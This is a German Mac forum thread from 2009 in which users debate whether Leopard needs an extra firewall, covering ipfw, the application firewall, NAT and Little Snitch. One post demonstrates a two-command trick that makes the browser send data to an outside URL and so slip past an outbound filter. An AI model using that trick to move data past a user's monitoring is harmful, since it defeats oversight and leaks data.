1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  2. Unsere jährliche Weihnachts-Banner-Aktion hat begonnen! Wir freuen uns auf viele, viele kreative Vorschläge.
    Mehr dazu könnt Ihr hier nachlesen: Weihnachtsbanner 2016

    Information ausblenden

Zusätzliche Firewall nötig?

Dieses Thema im Forum "macOS & OS X" wurde erstellt von Demnächst_Macer, 16.04.09.

  1. Demnächst_Macer

    Dabei seit:
    31.10.08
    Beiträge:
    57
    Hallo, ist eine zusätzliche Firewall unter Leopard nötig?

    Wie sollte ich die interne Firewall einstellen?
    Bei der 3. Option kann man - wenn ich das richtig verstanden habe - eine Liste erstellen, für die Programme, die Daten aus dem Internet empfangen dürfen. Ich habe also zum Probieren Safari nicht in die Liste getan, trotzdem kann ich damit im Internet surfen. Habe ich was falsch gemacht?

    Ist die 2. Option zu bevorzugen?

    Kann man damit auch den Datenausgang überwachen? Bisher sah ich nur, dass man den Dateneingang regeln kann.

    Was macht ihr, verwendet ihr eine zusätliche Firewall?

    Danke
     
  2. Snoopy181

    Snoopy181 Roter Astrachan

    Dabei seit:
    16.02.09
    Beiträge:
    6.333
    Ein zusätzliches Schutzprogramm richtet mehr Schaden an als es nutzt. Deswegen würde ich mir kein zusätzliches Firewall-/Virenschutz-Programm installieren.
     
  3. dewey

    dewey Gewürzluiken

    Dabei seit:
    01.05.06
    Beiträge:
    5.732
    ich würde noch little snitch nehmen. das überwacht die verbindungen von innen nach aussen
     
  4. awk

    awk Clairgeau

    Dabei seit:
    03.07.08
    Beiträge:
    3.687
    Apple setzt auf ipfw. Die grafische Oberfläche ist meines Erachtens ein wenig zu sehr vereinfacht.

    Das hier habe ich mir nicht ganz durchgelesen, sieht auf den ersten Blick ganz gut aus. Vorallem die allgemeinen Gedanken dazu (Seite 2) sind für den Einstieg vermutlich hilfreich. (bezieht sich auf 10.4, ich weiss nicht, ob es Änderungen zu 10.5 gibt, aber der allg. Teil behält seine Gültigkeit)

    Ausserdem interessant: http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/firewalls.html

    Sollte weiter Interesse bestehen, dann findet man mit "mac os x ipfw" bei google einiges.

    Und noch ein Link zu Firewalls. Meine Einstellung spiegelt sich in dem Punkt wieder.
     
    iStefan gefällt das.
  5. floorjiann

    floorjiann Strauwalds neue Goldparmäne

    Dabei seit:
    18.01.07
    Beiträge:
    639
  6. awk

    awk Clairgeau

    Dabei seit:
    03.07.08
    Beiträge:
    3.687
    Danke für den Link, wenn man sich allerdings mit Firewalls nicht auskennt, dann macht das Programm auch keinen Sinn. ;)
     
  7. QuickMik

    QuickMik Stahls Winterprinz

    Dabei seit:
    30.12.05
    Beiträge:
    5.189
    ich würde sagen......wenn man seinen NAT router nicht zerkonfiguriert, braucht es überhaupt keine FW.
    ich hab sie seit 1998 auf 100ten kisten nicht aktiv.
    nur so zum nachdenken.....
     
  8. MacMark

    MacMark Biesterfelder Renette

    Dabei seit:
    01.01.05
    Beiträge:
    4.708
    Die Firewall-GUI in OS X 10.4 und früher konfiguriert (allerdings nur eingeschränkt) die ipfw.

    Die Firewall-GUI in OS X 10.5 konfiguriert die mit 10.5 neu hinzugekommene "Application Level Firewall". Die programmabhängige Einstellung ist für den Benutzer leichter nachzuvollziehen als abstrakte Portnummern.
    Die ipfw ist nur noch per CLI einstellbar in 10.5, da sie ohnehin nur von Profis verstanden wird.(Ausnahme: Der "Tarnmodus" gehört zur ipfw und wird per GUI eingestellt.)

    10.5 betreibt beide Firewalls parallel, jede auf ihrer Protokollebene.

    Mehr dazu:
    http://www.macmark.de/osx_security.php#firewall
     
  9. iStefan

    iStefan Riesenboiken

    Dabei seit:
    19.11.07
    Beiträge:
    293
    Appel selber beschreibt die Wirkungsweise der Application Firewall hier:
    http://support.apple.com/kb/HT1810?viewlocale=de_DE
    Zusätzlich wird auch bei 10.5 ipfw gestartet und läuft permanent.
    Es sind aber keine Regeln definiert, wie sudo ipfw list zeigt
    (Ergebnis: 65535 allow ip from any to any).
    D.h. theoretisch reicht es aus ipfw Regeln beizubringen und diese bei Systemstart zu aktivieren.
    Das Hauptproblem dabei ist die Auswahl der richtigen Regeln für die entsprechenden Ports.
    Eine Liste dieser TCP- und UDP-Ports gibt es auch bei Apple:
    http://support.apple.com/kb/TS1629?viewlocale=de_DE
    Die Konfiguration von ipfw erfordert also eingehende Kenntnisse über die Kommunikationsanforderungen des eigenen Systems. Einfach ein paar Regeln erstellen ist schlussendlich nur eine Scheinsicherheit.
    Auch von Tools wie LittleSnitch rate ich ab.
    Zunächst einmal sollte man verstehen, welche Verbindungen der Rechner im Netzwerk hat. Dazu nimmt man am einfachsten sudo netstat -p udp bzw. sudo netstat -p tcp.
    Möchte man wissen, welche Programme eine Verbindung ins Netzwerk herstellen nimmt man
    sudo lsof -i.
    Den Netzverkehr live verfolgen kann man dann mit sudo tcpdump.
    Anschließend herrscht bereits mehr Klarheit. Hat man nichts außergewöhnliches installiert offenbart sich sehr schnell die Obsoleszenz von Tools wie LittleSnitch.
     
  10. MacMark

    MacMark Biesterfelder Renette

    Dabei seit:
    01.01.05
    Beiträge:
    4.708
    Little Snitch wird gern als "Security"-Programm eingeordnet. Ich halte das für einfältig, denn betrachte mal folgendes Szenario:
    Little Snitch benutzt Regeln, die festlegen, welches Programm auf welchem Port Daten rausschicken darf, meinetwegen auch noch, an wen es die schicken darf. Klingt gut, gelle?
    So: Deinem Browser wirst Du jede ausgehende Kommunikation auf Port 80 erlauben müssen, egal wohin. Wenn nicht, ist Dein Browser praktisch nutzlos.
    Es ist nun aber denkbar, daß ein "unartiges" Programm die Daten gar nicht selbst rausschickt, sondern dem Browser mitteilt, er möge eine bestimmte URL ansurfen und in der URL übergibt man dann ganz viele Daten. Das ist für den Browser technisch so, als wenn Du hier einen Kommentar postest. Die eigentliche Verbindung macht dann der Browser auf und die Daten schickt auch der Browser raus.

    Beispiel: Im Terminal diesen Befehl, den jedes Programm absetzen könnte:
    Code:
    echo "URL=http://www.macmark.de?yourdata=all_your_base_is_belong_to _us" > badboy.url
    
    Und dann diesen:
    Code:
    open badboy.url
    
    Was passiert? Dein Browser schickt die angegebenen Daten an mich. Das funktioniert mutmaßlich auch mit aktivem Little Snitch. Mit Zeilenumbruch am Ende sollte es nicht nur auf OS X so klappen.

    Man kann also leicht Little Snitch ausweichen. Ich habe das nicht selbst ausprobiert, aber vielleicht testet das mal jemand, der Little Snitch benutzt

    Little Snitch installiert meines Wissens eine Kernel-Extension. Prozesse unter root sind immer beliebtes Angriffsziel. Fällt der Prozeß, ist das System meistens Toast (falls nicht sandboxed, siehe meine Seite). Hat Little Snitch einen Bug, hat man ein Problem, denn Little Snitch liest ja jeden ausgehenden Verkehr und ist damit leicht zu erreichen.

    Fragen: Blockt Little Snitch eigenen Nach-Hause-Verkehr? Vertraut man dem Entwickler des Programmes? Kann man in den Quellcode schauen?

    Es gibt auch andere Wege, den Netzverkehr von Programmen zu überwachen, ohne Little Snitch: netstat, tcpdump etc. Alles Bordmittel.

    Ich bin sehr vorsichtig damit, was ich als root laufen lasse. Little Snitch läuft bei mir jedenfalls nicht.
     
  11. QuickMik

    QuickMik Stahls Winterprinz

    Dabei seit:
    30.12.05
    Beiträge:
    5.189
    naja....eine firewall ist LS sicher nicht.
    leider wird sie oft als solche bezeichnet.
    paket filter würde es eher treffen.

    die ipfw ist mächtig aber von apple schon fast sträflich vernachläßigt.

    ausserdem würde ich sagen, das man schon die kirche im dorf lassen sollte.
    man kann mit recht einfachen dingen....relativ hohe sicherheit erreichen.
    die letzten 10 % sind immer ein enormer aufwand und ohne knowhow nicht zu verkleinern.

    wir haben schon öfter hier auf AT über sicherheit, sicherheit von os x, firewall u.ä. disskutiert.

    wie schon öfter erwähnt, verwenden die meisten einen router und sind somit über NAT schon mal relativ sicher. wenn man dann noch UnPn NICHT aufdreht, ist es noch besser.

    wenn man natürlich limewire, bittorrent usw. am rödeln hat, braucht man sich nicht wundern, wenn man sich was einfängt.
    diese "gnome" (als überbegriff für virus,würmer, trojaner) mal auf der platte, wird es natürlich recht schwierig sie von ihrer eigentlichen bestimmung abzuhalten.

    also so wie ich das sehe, sind os x rechner auch ohne aktive firewall (und LS) hinter einem normalen NAT router recht sicher, wenn sie keine oben beschriebene software verwenden.

    da braucht man sich (weder in vergangenheit noch in naher zukunft) wegen gnomen einen kopf machen.

    und bevor wieder zeter und mordio geschrien wird....

    ich betreue 100te rechner im unternehmens oder privaten bereich.
    seit schon fast jahrzenten.
    habe bis jetzt noch niemanden über "gnome" klagen gehört.
    oder geschweige denn, einen gefunden.

    also...lassen wir doch die kirche im dorf.

    ciao
    mike
     
  12. MacMark

    MacMark Biesterfelder Renette

    Dabei seit:
    01.01.05
    Beiträge:
    4.708
    Ein Paket-Filter ist eine ganz klassische Firewall. Beispielsweise die ipfw in aber nicht nur in OS X. Sie filtert auf Netzwerkebene ohne die agierenden Programme zu kennen. Es kann beliebig ein- und ausgehender Verkehr gefiltert werden.

    Little Snitch ist wie die zusätzlich neu in 10.5 hinzugekommene Firewall in OS X eine Application-Level-Firewall, da die Regeln auch die betroffenen Programme berücksichtigen. Die OS X-interne AL-Firewall konzentriert sich auf eingehenden Verkehr, Little Snitch kümmert sich hingegen um ausgegehenden Verkehr auf Programmebene.

    Mit IPv6 ist NAT endlich obsolet. Dann kann wieder jeder Teilnehmer direkt adressiert werden. NAT ist nur eine Krücke, weil IPv4 zu wenige Adressen ermöglicht.
     
  13. Rastafari

    Rastafari Golden Noble

    Dabei seit:
    10.03.05
    Beiträge:
    17.893
    Das glaube ich eher nicht. :)
     
  14. MacMark

    MacMark Biesterfelder Renette

    Dabei seit:
    01.01.05
    Beiträge:
    4.708
    Im Normalfall verbietet jedoch niemand seinem Webbrowser, irgendwelche Seiten zu besuchen. :p
     
  15. Rastafari

    Rastafari Golden Noble

    Dabei seit:
    10.03.05
    Beiträge:
    17.893
    Es geht ja auch nur um das blocken *heimlicher* Verbindungsversuche. So wie das zB eine Spyware-Applikation mit integrierter Backdoor machen würde. Per Webbrowser einen Rechner effektiv auszuspionieren oder gar fernzusteuern gestaltet sich dagegen doch etwas ... trocken. :)

    PS
    Safari den Zugriff auf diverse Banner- und Adware-Server zu sperren hältst du nicht für sinnvoll? Andere machen das mit AdBlock...
     
  16. MacMark

    MacMark Biesterfelder Renette

    Dabei seit:
    01.01.05
    Beiträge:
    4.708
    Die meisten User werden Safari Webverbindungen pauschal in Little Snitch erlauben. Und wenn die Spyware, wie dargestellt, den Browser zu einem Request veranlaßt, und dieser die Daten an einen nicht als AD-Server bekannte URL schickt, dann hat die Spyware den Little Snitch mit ihrem Spiel "über Bande" geleimt.

    Worauf ich hinaus will ist, daß der eigentliche Vorteil, den sich die Leute von Little Snitch erhoffen, einfach umgangen werden kann.
     
  17. QuickMik

    QuickMik Stahls Winterprinz

    Dabei seit:
    30.12.05
    Beiträge:
    5.189
    ACK

    was will mir einer mit einer url auf einem mac schon unterjubeln.
    safari fragt sowieso, wenn eine applikation runtergeladen wird.
    und wenn man dann 7x auf ok drückt.....naja, derartigen leuten ist wohl schwer zu helfen.

    also wie gesagt, ich finde, das man keine unnötige panik verbreiten sollte.

    bin nach wie vor der meinung, das ene FW "nur" für eingehenden verkehr sowieso sinnlos ist.
    nochmal...da reicht ein NAT router.
    von innen nach aussen, sollte man sich wirklich überlegen was und ob man etwas braucht.

    ich persönlich richte z.b. die host datei ganz gerne gegen die von den hersteller erzwungenen update geschichten ein.

    bin der meinung, das es adobe nicht angeht, wann ich mein PS öffne und schließe.
    mag sein, das sowas paranoid ist. aber mir geht diese bevormundung auf den geist.

    aber auch dazu brauche ich keine FW. weil ich weiß, was ich tue.

    denke, das hier sowieso der punkt ist.
    wenn man weiß, was man tut.....braucht es keine FW o.ä.

    wenn ich meine kiste als DMZ bei den supertollen FW routern um 50€ einrichte und dann auch noch das FTP,SMP,AFP als gast offen habe.

    naja, dann glaube ich aber, das ich auch zu blöd für ein FW wäre.
     
  18. MacMark

    MacMark Biesterfelder Renette

    Dabei seit:
    01.01.05
    Beiträge:
    4.708
    Du stehst am völlig falschen Bahnhof. Du hast mich nicht verstanden! Versuche ich es mal so:

    Nimm an, Du hast Photoshop installiert und willst nicht, daß es etwas an Adobe schickt. Also blockst Du jeden ausgehenden Versuch mit Little Snitch. Photoshop kann aber trotzdem alles an Adobe schicken, indem es eine passende URL indirekt mit dem Browser öffnen läßt. Dann schickt Safari einen von vielen Requests raus und Du bist angeschmiert. Du wirst sicher nicht Adobes Website blocken für Safari, weil Du da ja auch selbst mal bei Adobe rumschauen willst.
     
  19. QuickMik

    QuickMik Stahls Winterprinz

    Dabei seit:
    30.12.05
    Beiträge:
    5.189
    ACK
    wenn aber adobe sowas machen würde, wäre das ja schon ein IMHO arglistig verschwiegener weg....
    da würden schon einige verbraucherschützer u.ä. auf die barrikaden steigen.
    schließlich nutzen sie ja ihre internet aktivierung und brauchen auf deratige trojanische methoden nicht zurück greifen.

    kann mich noch erinnern, als apple wissen wollte, welche musik man mit itunes hört.
    obwohl, mit ihrer genius geschichte und mit dem cover laden, werden sie das auch rausbekommen.

    ich muß sagen, das ich von M$ sehr überrascht war, das die derartige dinge nicht mehr machen.
    velleicht haben sie ja aus der vergangenheit gelernt......ob nur am mac....entzieht sich meiner kenntnis.

    aber bitte mich nicht falsch verstehen...
    wollte wirklich nur, das man die kirche im dorf läßt.
    firewall und security threads werden sehr schnell zu paranoia threads. wie wir hier immer wieder erleben können.
    und das ist wirklich nicht notwendig.

    und das meine ich genau so.
    man kann heute einen frisch installierten mac an eine echte offizielle IP hängen und muß nicht befürchten....
    das er in den nächsten wochen gehackt wird.

    anders bei windows, wie zahlreiche versuche ergeben haben.
    nach 3 min. war die kiste schon gekidnappt.

    wenn ich mir den titel dieses threads ansehe.......
    klare antwort von mir ....nein...es ist gar keine FW nötig.
    begründungen hab ich ja schon geliefert.
     
  20. rc4370

    rc4370 Wöbers Rambur

    Dabei seit:
    09.03.09
    Beiträge:
    6.528
    habe eine firewall im router. seit jahren keine probleme.
     

Diese Seite empfehlen